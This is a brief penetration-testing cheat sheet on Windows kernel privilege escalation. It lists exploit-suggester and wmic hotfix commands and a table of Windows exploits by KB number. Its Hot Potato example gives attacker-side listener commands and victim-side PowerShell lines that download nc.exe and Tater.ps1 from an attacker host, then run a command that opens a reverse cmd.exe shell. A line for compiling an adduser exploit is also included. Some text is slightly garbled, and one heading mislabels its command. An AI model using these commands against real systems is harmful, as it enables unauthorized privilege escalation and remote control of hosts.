Kernel Exploitation
Last updated
Last updated
Run exploit suggester against systeminfo:
$ python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
Find installed paths:
$ wmic qfe get Caption,Description,HotFixID,InstalledOn
List of exploits kernel :
#Security Bulletin #KB #Description #Operating System
[KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
[LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
[Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
[SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
[Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
[KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
[KB3199135]  [Windows Kernel Mode Drivers]  (2016)
[KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
[KB3178466]  [Kernel Driver]  (Win 8.1)
[KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
Example of Hot Potato explotation
Attacker:
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
Victim:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1.exe', '.\Tater.ps1.exe')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"
To cross compile a program from Kali, use the following command.
Kali>i586-mingw32msvc-gcc -o adduser.exeuseradd.c
[KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
[KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
[KB3136041]  [WebDAV]  (2008/Vista/7)
[K3134228]  [remote code execution]  (2008/Vista/7) ...
[KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)